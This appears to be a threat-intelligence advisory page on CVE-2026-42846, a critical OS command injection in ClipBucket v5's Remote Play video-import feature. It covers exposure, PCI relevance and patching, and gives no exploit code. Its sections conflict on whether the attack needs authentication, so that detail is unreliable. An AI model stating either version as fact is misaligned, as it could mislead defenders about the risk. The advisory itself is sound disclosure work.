External risk intelligence

ClipBucket Remote Play Arbitrary Command Execution

CVE advisorySeverity: CRITICAL (CVSS 9.8)

CVE-2026-42846

A critical vulnerability in ClipBucket's Remote Play feature allows arbitrary command execution via a specially crafted URL. This impacts organizations using ClipBucket v5 for video sharing by potentially enabling command execution on their servers through unauthenticated access.

4Halo Surface Signal

OS Command Injection

External exposure likelihood

Halo Surface Signal score for CVE-2026-42846

ClipBucket is a video sharing platform designed to be a public-facing web application. Features such as importing videos from external URLs are core functional components of such platforms, making the application's interface commonly reachable from the internet.

PCI scan relevance

PCI Relevance for CVE-2026-42846

Yes

CVE-2026-42846 — Halo PCI Relevance: Yes. Under typical PCI ASV external scan criteria, this issue may be flagged for scan prioritization.

This vulnerability allows for arbitrary command execution, which can lead to a PCI scan failure.

Scan-prioritization guidance only—not a PCI DSS certification or ASV attestation.

Horizon Alert

Summary of the vulnerability and why it matters

A critical vulnerability exists in the ClipBucket video sharing platform, allowing for arbitrary command execution through specially crafted URLs. This could impact any organization using this platform for video content management and distribution.

Allows attackers to run commands on servers.
Matters if your company uses ClipBucket for video sharing.
Confirm relevance and exposure of ClipBucket usage.

Attack Path

How an attacker could exploit the issue

An attacker can exploit this vulnerability by leveraging the Remote Play feature within ClipBucket. This feature allows users to add videos by importing external URLs, and the vulnerability arises because the provided URL is directly incorporated into shell commands without proper sanitization. This could allow an attacker to execute arbitrary commands on the server.

Requires unauthenticated access.
Triggered by submitting a malicious URL.
Allows arbitrary command execution.

Live Threat

Current exploitation, exposure, and threat context

This vulnerability could allow an unauthenticated user to execute arbitrary commands on the server when the Remote Play feature is used to import a video from an external URL.

Server-side commands may execute.
External URLs can trigger commands.
Server compromise is possible.

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

This vulnerability impacts ClipBucket v5, a self-hosted video sharing platform. The "Remote Play" feature, which allows authenticated users to import videos via external URLs, is susceptible to arbitrary command execution due to improper URL handling. This means that the team responsible for the ClipBucket application instances, likely the platform or application owners, should prioritize identifying all deployments. The first practical step is to confirm the presence and accessibility of affected ClipBucket instances, determine their business criticality, and assign ownership for remediation.

Application owners must own the issue.
Verify instance exposure and criticality.
Plan remediation based on risk.

Frequently asked questions

What is ClipBucket?

ClipBucket is an open-source platform designed for hosting and sharing video content. It functions as a web-based management system that organizations use to distribute media. Its features include tools for importing external video sources to build content libraries, which is the specific area affected by this vulnerability.

How does CVE-2026-42846 allow code execution?

This vulnerability is classified as CWE-78, or OS Command Injection. It occurs because the software takes a user-provided URL and incorporates it directly into a system shell command without cleaning or escaping the input. Because the system does not distinguish between the intended URL and additional malicious instructions, it executes any shell commands embedded in that input.

What triggers this arbitrary command execution?

The issue is triggered when the platform's 'Remote Play' feature processes a specially crafted URL intended to import an external video. The flaw is not triggered by standard, legitimate video imports that contain only valid URL characters. It requires the input of specific shell metacharacters that the application fails to neutralize before passing the string to the server.

Is my ClipBucket instance at risk?

According to Halo Surface Signal, ClipBucket is typically deployed as a public-facing web application to facilitate video sharing. Because its core functions are designed to be reachable from the internet, any instance accessible from the public web faces a higher risk of being targeted by unauthorized users than those restricted to internal networks.

When should I update ClipBucket?

You should prioritize this update immediately. The first step is to locate all deployments of ClipBucket within your environment to determine which are currently active or internet-accessible. Once you have identified your instances, confirm their version and apply the patch provided in version 5.5.3 - #140 to resolve the improper command handling.

References

github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-hvf…

Written by Nicholas Merritt

External-surface CVE analysis and Halo Surface Signal prioritization for Halo Threat Intelligence.